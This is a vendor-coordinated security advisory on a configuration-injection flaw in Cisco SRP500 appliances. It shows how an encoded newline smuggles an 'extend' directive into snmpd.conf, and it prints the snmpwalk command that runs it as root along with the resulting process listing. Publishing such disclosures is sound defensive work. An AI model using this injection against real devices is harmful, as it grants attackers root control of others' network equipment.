Sekcje

Przejdź na skróty do treści. | Przejdź do nawigacji


Devices hacking research Cisco SRP500 OS ROOT

Cisco SRP500 OS ROOT

About Cisco SRP500 Series

Cisco SRP 500 is a small business pro appliance which offers such features as (information from cisco.com): "Integrated security, VPN capabilities, and an 802.11n wireless access point", "(SIP) stack to deliver clear, high-quality voice service" or "Intelligence to support voice, data, security, and application services".

The appliance can be managed via web management console.

The vulnerabilities were tested on Cisco SRP527W (firmware: V1.01.19; Cisco confirmed that all firmwares prior to version 1.1.24 are affected)

srp237w

Image copyright Cisco.com

Details

SNMPD configuration file injection.

Due to lack of proper validation in web interface one can inject a line to snmpd.conf allowing for OS command execution as root.

Steps:

  • Logging into web management
  • Injecting "extend ps /bin/ps" line using %0a and the following HTTP request:

srp http request

  • Querying the device using snmpwalk:
$ snmpwalk -v 1 -c public 192.168.15.1 NET-SNMP-EXTEND-MIB::nsExtendOutput1Table
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."ps" = STRING:   PID USER       VSZ STA
T COMMAND
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."ps" = STRING:   PID USER       VSZ STAT
 COMMAND
    1 admin     4472 S    /sbin/init
    2 admin        0 SW<  [kthreadd]
    3 admin        0 SWN  [ksoftirqd/0]
    4 admin        0 SW<  [events/0]
    5 admin        0 SW<  [khelper]
   39 admin        0 SW<  [kblockd/0]
   53 admin        0 SW   [crypto]
   54 admin        0 SW   [crypto_ret]
   59 admin        0 SW   [pdflush]
   60 admin        0 SW   [pdflush]
   61 admin        0 SW<  [kswapd0]
   62 admin        0 SW<  [aio/0]
  183 admin        0 SW<  [mtdblockd]
  184 admin        0 SW<  [nftld]
  280 admin     4160 S    /sbin/init
  282 admin     3464 S    router_provisioning
  283 admin     2440 S    ledapp &
  346 admin     1888 S    hotplug_3g
  347 admin     3532 S    usb_3g
  358 admin        0 SW<  [khubd]
  437 admin        0 SWN  [jffs2_gcd_mtd8]
  440 admin        0 SWN  [jffs2_gcd_mtd3]
  477 admin        0 SW<  [loop0]
  478 admin        0 SWN  [jffs2_gcd_mtd4]
  479 admin        0 SWN  [jffs2_gcd_mtd6]
  551 admin     1552 S    syslogd -L -s 20 -b 1
  553 admin     1552 S    klogd
  555 admin     2504 S    cpu_load
  556 admin     1980 S    sh -c mpstat 2
  557 admin     1628 S    mpstat 2
  560 admin     3172 S    tftpd -a 192.168.15.1 -s /tmp -c -l
  561 admin     1704 S    cron
  579 admin     4500 S    httpd
  583 admin     1760 S    dnsmasq -C /tmp/dnsmasq.conf -r /tmp/dns_resolv.conf
  599 admin     3784 S    upnpd br0
  609 admin     2068 S    dropbear -d /etc/dropbear_dss_host_key -r /etc/dropbe
  610 admin    18096 S    cdpd
  614 admin     3060 S    cmd_server
  692 admin     1980 S    /bin/sh /etc/start_voice
  700 admin     1552 S    /usr/sbin/udhcpd /tmp/udhcpd_0.conf
  706 admin     1552 S    /usr/sbin/udhcpd /tmp/udhcpd_1.conf
  728 admin    23144 S    /sbin/spr_voip
  913 admin     6308 R    snmpd -c /tmp/snmpd.conf
 1503 admin     1984 R    /bin/ps 0.0.0.0/0.0.0.0
NET-SNMP-EXTEND-MIB::nsExtendOutNumLines."ps" = INTEGER: 45
NET-SNMP-EXTEND-MIB::nsExtendResult."ps" = INTEGER: 0

Vendor's reaction / issue history

  • 12.07.2011 - full disclosure sent to the vendor
  • 16.09.2011 - initial, internat fix issued by the vendor
  • 02.11.2011 - patch issued by the vendor, Cisco public announcement
  • 25.11.2011 - public disclosure by Securitum

Thanks to Gaweł Mikołajczyk for providing test hardware.

Research / contact

  • We are performing research on web management interfaces on network appliances. If you want to help, feel free to contact as @ devices_hacking@securitum.pl

Disclaimer

  • All the information is provided for educational use only.
  • We strongly discourage to use the information for cracking / illegal purposes.
  • We are not responsible for damages made to your router - play with your router carefully.

 

Michal Sajdak
michal.sajdak@securitum.pl

Przydatne informacje? Polub nas na facebooku.

Darmowy magazyn o ITsec

zine
Subskrybuj RSS:
RSS